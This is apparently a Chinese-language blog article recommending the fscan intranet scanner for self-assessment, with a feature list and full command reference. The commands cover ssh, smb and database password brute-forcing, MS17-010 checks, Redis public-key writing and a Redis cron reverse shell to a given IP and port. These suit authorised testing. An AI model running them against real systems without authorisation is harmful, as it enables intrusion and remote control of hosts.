內網安全漏洞掃描工具fscan 主機漏洞掃描工具有哪些

最近幾年 , 經常會開展一些HW行動 , 大的單位或者有錢有經費的單位會找團隊來做HW的防范服務 , 普通單位沒錢沒經費 , 怎么辦?
這里分享一款快捷、簡單的安全漏洞掃描工具fscan , 普通人都能使用 , 簡單檢測一下單位內部系統的安全漏洞 。免費的 , 開源的 。就一個小文件 , 4M多一點 。
fscan是一款用go語言編寫的開源工具 , 一款內網綜合掃描工具 , 方便一鍵自動化、全方位漏掃掃描 。
按照軟件官方的說法 , 該工具支持主機存活探測、端口掃描、常見服務的爆破、ms17010、redis 批量寫公鑰、計劃任務反彈 shell、讀取 win 網卡信息、web 指紋識別、web 漏洞掃描、netbios 探測、域控識別等功能
主要功能1.信息搜集:

  • 存活探測(icmp)
  • 端口掃描
2.爆破功能:
  • 各類服務爆破(ssh、smb等)
  • 數據庫密碼爆破(mysql、mssql、redis、psql等)
3.系統信息、漏洞掃描:
  • netbios探測、域控識別
  • 獲取目標網卡信息
  • 高危漏洞掃描(ms17010等)
4.Web探測功能:
  • webtitle探測
  • web指紋識別(常見cms、oa框架等)
  • web漏洞掃描(weblogic、st2等,支持xray的poc)
5.漏洞利用:
  • redis寫公鑰或寫計劃任務
  • ssh命令執行
6.其他功能:
  • 文件保存
有經驗的可以自己編譯 , 我們普通人就直接下載編譯好的工具使用就可以 , 下載地址在最后 。
使用比較簡單 , 命令行下運行就可
簡單用法fscan.exe-h192.168.1.1/24(默認使用全部模塊)fscan.exe-h192.168.1.1/16(B段掃描)其他用法fscan.exe-h192.168.1.1/24-np-no-nopoc(跳過存活檢測、不保存文件、跳過webpoc掃描)fscan.exe-h192.168.1.1/24-rfid_rsa.pub(redis寫公鑰)fscan.exe-h192.168.1.1/24-rs192.168.1.1:6666(redis計劃任務反彈shell)fscan.exe-h192.168.1.1/24-cwhoami(ssh爆破成功后 , 命令執行)fscan.exe-h192.168.1.1/24-mssh-p2222(指定模塊ssh和端口)fscan.exe-h192.168.1.1/24-pwdfpwd.txt-userfusers.txt(加載指定文件的用戶名、密碼來進行爆破)fscan.exe-h192.168.1.1/24-o/tmp/1.txt(指定掃描結果保存路徑,默認保存在當前路徑)fscan.exe-h192.168.1.1/8(A段的192.x.x.1和192.x.x.254,方便快速查看網段信息)fscan.exe-h192.168.1.1/24-msmb-pwdpassword(smb密碼碰撞)fscan.exe-h192.168.1.1/24-mms17010(指定模塊)fscan.exe-hfip.txt(以文件導入)完整參數
  • -c string
  • ssh命令執行
  • -cookie string
  • 設置cookie
  • -debug int
  • 多久沒響應,就打印當前進度(default 60)
  • -domain string
  • smb爆破模塊時,設置域名
  • -h string
  • 目標ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
  • -hf string
  • 讀取文件中的目標
  • -hn string
  • 掃描時,要跳過的ip: -hn 192.168.1.1/24
  • -m string
  • 設置掃描模式: -m ssh (default “all”)
  • -no
  • 掃描結果不保存到文件中
  • -nobr
  • 跳過sql、ftp、ssh等的密碼爆破
  • -nopoc
  • 跳過web poc掃描
  • -np
  • 跳過存活探測
  • -num int
  • web poc 發包速率 (default 20)
  • -o string
  • 掃描結果保存到哪 (default “result.txt”)
  • -p string
  • 設置掃描的端口: 22 | 1-65535 | 22,80,3306 (default “21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017”)
  • -pa string
  • 新增需要掃描的端口,-pa 3389 (會在原有端口列表基礎上,新增該端口)
  • -path string
  • fcgi、smb romote file path
  • -ping
  • 使用ping代替icmp進行存活探測
  • -pn string
  • 掃描時要跳過的端口,as: -pn 445
  • -pocname string
  • 指定web poc的模糊名字, -pocname weblogic
  • -proxy string
  • 設置代理, -proxy http://127.0.0.1:8080
  • -user string
  • 指定爆破時的用戶名
  • -userf string
  • 指定爆破時的用戶名文件
  • -pwd string
  • 指定爆破時的密碼
  • -pwdf string
  • 指定爆破時的密碼文件
  • -rf string
  • 指定redis寫公鑰用模塊的文件 (as: -rf id_rsa.pub)
  • -rs string
  • redis計劃任務反彈shell的ip端口 (as: -rs 192.168.1.1:6666)
  • -silent
  • 靜默掃描,適合cs掃描時不回顯
  • -sshkey string
  • ssh連接時,指定ssh私鑰
  • -t int
  • 掃描線程 (default 600)
  • -time int
  • 端口掃描超時時間 (default 3)
  • -u string
  • 指定Url掃描
  • -uf string
  • 指定Url文件掃描
  • -wt int
  • web訪問超時時間 (default 5)
【內網安全漏洞掃描工具fscan 主機漏洞掃描工具有哪些】

推薦閱讀